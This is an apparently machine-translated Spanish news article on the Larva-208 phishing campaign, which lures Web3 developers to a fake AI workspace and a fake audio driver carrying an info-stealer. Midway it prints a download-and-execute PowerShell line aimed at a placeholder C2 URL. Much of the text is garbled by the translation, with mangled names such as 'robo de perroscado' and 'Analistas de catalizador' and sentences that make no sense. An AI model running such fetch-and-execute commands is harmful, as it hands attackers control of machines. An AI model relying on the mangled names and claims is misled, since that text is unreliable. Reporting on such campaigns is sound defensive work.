Ha surgido una sofisticada campaña de phishing dirigida a los desarrolladores de Web3, explotando el creciente interés en las plataformas de inteligencia artificial para ofrecer malware de robo de credenciales.
El actor de amenaza Larva-208, anteriormente conocido por atacar el personal de TI a través de la ingeniería social basada en el teléfono, ha girado para centrarse en los desarrolladores de blockchain utilizando una plataforma de espacio de trabajo falso de IA meticulosamente elaborada.
El ataque comienza con ofertas de trabajo aparentemente legítimas o solicitudes de revisión de cartera enviadas a los desarrolladores de Web3, lo que los dirige a las solicitudes fraudulentas de la compañía de inteligencia artificial.
Estas comunicaciones aprovechan la técnica MITER ATT & CK T1566.002 (enlace Spearphishing) para atraer a las víctimas al acceder a plataformas maliciosas utilizando códigos de invitación únicos y direcciones de correo electrónico.
Una vez que las víctimas se involucran con la plataforma falsa, se encuentran con un mensaje de error engañoso que afirma que sus conductores de audio están desactualizados o faltantes, lo que les lleva a descargar lo que parece ser un genuino controlador de audio HD Realtek.
Larva-208 La cadena de ataque de los desarrolladores de Web3 (fuente-Catalyst)
Analistas de catalizador identificado Esa larva-208 ha creado estratégicamente una réplica convincente de la plataforma legítima del espacio de trabajo de AI AI a través de su dominio malicioso “Norlax.ai”.
Esta técnica de tipogratación de dominio (T1583.001 – dominios) crea una interfaz casi idéntica para engañar a los desarrolladores desprevenidos que pueden estar familiarizados con las herramientas legítimas de colaboración de IA.
El “controlador” descargado es en realidad un malware sofisticado que ejecuta comandos de PowerShell integrados (T1059.001-PowerShell) para recuperar e implementar el robo de la infraestructura de comando y control de Larva-208.
La ejecución de PowerShell se puede representar como:-
# Representación simplificada de la ejecución de la carga útil maliciosa Invoke -WebRequest -uri “C2_Server_url” | Invoca-Expresión
Capacidades avanzadas de exfiltración de datos
El robo de perroscado demuestra capacidades integrales de recolección de información, recolectando sistemáticamente los datos de identificación del dispositivo, las especificaciones de hardware, los detalles del sistema operativo e información de geolocalización, incluidas las direcciones IP y las ubicaciones geográficas.
Los catálogos de malware instalaron el software, monitorea los procesos activos y transmite toda la inteligencia recopilada a los servidores de comando y control de Larva-208 (T1583.004-servidor), que se alojan a través del servicio de alojamiento a prueba de balas de FFV2.
Los investigadores de seguridad han atribuido directamente esta campaña al grupo de amenazas de mantis luminosas más amplias, lo que indica un esfuerzo coordinado para expandirse más allá de la TI tradicional para el ecosistema lucrativo del desarrollador Web3.
Aumentar la detección, reducir la fatiga de alerta, acelerar la respuesta; Todo con una caja de arena interactiva construida para equipos de seguridad -> Prueba cualquiera.
